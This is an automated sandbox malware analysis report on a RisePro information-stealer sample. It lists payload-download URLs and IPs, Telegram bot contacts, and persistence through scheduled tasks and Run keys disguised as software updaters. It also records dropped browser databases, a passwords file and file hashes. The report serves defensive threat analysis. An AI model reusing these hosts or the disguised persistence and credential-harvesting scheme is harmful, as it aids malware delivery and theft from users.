            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr | false | Avira URL Cloud: safe | unknown
            https://kuljyftgjk.online/server/k/l2.exe5P#. | file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://t.me/RiseProSUPPORT | file.exe, 00000000.00000002.4445088347.0000000006449000.00000004.00000020.00020000.00000000.sdmp, dZGGvSkztfgYu5jqSY21Wne.zip.0.dr | false | Avira URL Cloud: safe | unknown
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr | false | URL Reputation: safe | unknown
            https://www.ecosia.org/newtab/ | file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr | false | URL Reputation: safe | unknown
            https://ipinfo.io/Mozilla/5.0 | file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | D87fZN3R3jFeplaces.sqlite.0.dr | false | URL Reputation: safe | unknown
            https://kuljyftgjk.online/server/k/l2.exedwzLnNKYB4T0Vnw.exe | file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://ac.ecosia.org/autocomplete?q= | file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr | false | URL Reputation: safe | unknown
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.dr | false | URL Reputation: safe | unknown
            https://t.me/risepro_bot | file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142639137.0000000006550000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.0.dr | false | Avira URL Cloud: safe | unknown
            https://ipinfo.io/ | file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4443887762.0000000001682000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016B9000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://kuljyftgjk.online:80/I | file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://5.42.96.170/server/k/l2.exeDTl | file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.dr | false | URL Reputation: safe | unknown
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr | false | URL Reputation: safe | unknown
            http://5.42.96.170/server/k/l2.exe5 | file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://ipinfo.io/t | file.exe, 00000000.00000002.4443887762.0000000001682000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://kuljyftgjk.online:80/server/k/l2.exe5G | file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://kuljyftgjk.online/server/k/l2.exexefN | file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL | D87fZN3R3jFeplaces.sqlite.0.dr | false | URL Reputation: safe | unknown
            https://t.me/risepro_botisepro_bot | file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://kuljyftgjk.online/server/k/l2.exeo | file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.winimage.com/zLibDll | file.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
            https://ipinfo.io:443/widget/demo/12.205.151.60 | file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://support.mozilla.org | D87fZN3R3jFeplaces.sqlite.0.dr | false | URL Reputation: safe | unknown
            https://kuljyftgjk.online/server/k/l2.exe | file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://kuljyftgjk.online:80/Mi&/ | file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr | false | URL Reputation: safe | unknown
            https://kuljyftgjk.online:80/server/k/l2.exeJG | file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://kuljyftgjk.online/ | file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://kuljyftgjk.online/Bb | file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    https://t.me/risepro_bot%(file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://kuljyftgjk.online/onsfile.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
IP | Domain | Country | ASN | ASN Name | Malicious
34.117.186.192 | ipinfo.io | United States | 139070 | GOOGLE-AS-AP Google Asia Pacific Pte Ltd SG | false
5.42.96.65 | unknown | Russian Federation | 39493 | RU-KSTV Kolomna Group of companies Guarantee-tv RU | true
172.67.75.166 | db-ip.com | United States | 13335 | CLOUDFLARENET US | false
5.42.96.170 | unknown | Russian Federation | 39493 | RU-KSTV Kolomna Group of companies Guarantee-tv RU | true
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1443534
                    Start date and time:2024-05-17 23:44:10 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 10m 0s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:22
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@24/32@5/4
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 73%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • TCP Packets have been reduced to 100
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateFile calls found.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe
Time | Type | Description
17:45:16 | API Interceptor | 5044664x Sleep call for process: file.exe modified
17:45:53 | API Interceptor | 1757121x Sleep call for process: oobeldr.exe modified
23:45:15 | Task Scheduler | Run new task: MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR path: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
23:45:16 | Task Scheduler | Run new task: MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG path: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
23:45:16 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe
23:45:18 | Task Scheduler | Run new task: Telemetry Logging path: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
23:45:24 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe
23:45:33 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                    Category:dropped
                    Size (bytes):4563640
                    Entropy (8bit):7.906115886926003
                    Encrypted:false
                    SSDEEP:98304:RpvmMxvdjYr/2BLOizdh/0Rzs24+WhXWXfRqCFh6MacgD5hB:vlVjMuBx0R7RrXpqiUhB
                    MD5:AF6E384DFABDAD52D43CF8429AD8779C
                    SHA1:C78E8CD8C74AD9D598F591DE5E49F73CE3373791
                    SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
                    SHA-512:B55BA87B275A475E751E13EC9BAC2E7F1A3484057844E210168E2256D73D9B6A7C7C7592845D4A3BF8163CF0D479315418A9F3CB8F2F4832AF88A06867E3DF93
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 83%
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                    Category:dropped
                    Size (bytes):697462
                    Entropy (8bit):7.9978720978672815
                    Encrypted:true
                    SSDEEP:12288:SGiq3xwkqDfTtkdTpKrZgIFxEtmeY3XV1ZiXUoqm:SVsxwR7TOTKr1rEtVY3Biko5
                    MD5:09613B60CB6D5DCD89B5B2D39F4345A8
                    SHA1:694B5F31527A749E51B3355A25C594C3FEE26308
                    SHA-256:30D7CB2080B3FDA7D9814C2967781C92F0FFC05B556DE8E2ACAA5EA627661349
                    SHA-512:8A5A9083C9E33CE59A4EBB8027594EF310239BFE6B18E19ED41D189C94FDC5B81C79AB04B921197E577E64DCABBC779C309AFF3414946C0BEEA5DACE4A0CB485
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\dZGGvSkztfgYu5jqSY21Wne.zip, Author: Joe Security
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):98304
                    Entropy (8bit):0.08235737944063153
                    Encrypted:false
                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                    Malicious:false
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):5242880
                    Entropy (8bit):0.03859996294213402
                    Encrypted:false
                    SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                    MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                    SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                    SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                    SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                    Malicious:false
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):159744
                    Entropy (8bit):0.5394293526345721
                    Encrypted:false
                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                    Malicious:false
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):155648
                    Entropy (8bit):0.5407252242845243
                    Encrypted:false
                    SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                    MD5:7B955D976803304F2C0505431A0CF1CF
                    SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                    SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                    SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                    Malicious:false
                    Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):155648
                    Entropy (8bit):0.5407252242845243
                    Encrypted:false
                    SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                    MD5:7B955D976803304F2C0505431A0CF1CF
                    SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                    SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                    SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                    Malicious:false
                    Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                    Category:dropped
                    Size (bytes):20480
                    Entropy (8bit):0.8439810553697228
                    Encrypted:false
                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                    Category:dropped
                    Size (bytes):20480
                    Entropy (8bit):0.6732424250451717
                    Encrypted:false
                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
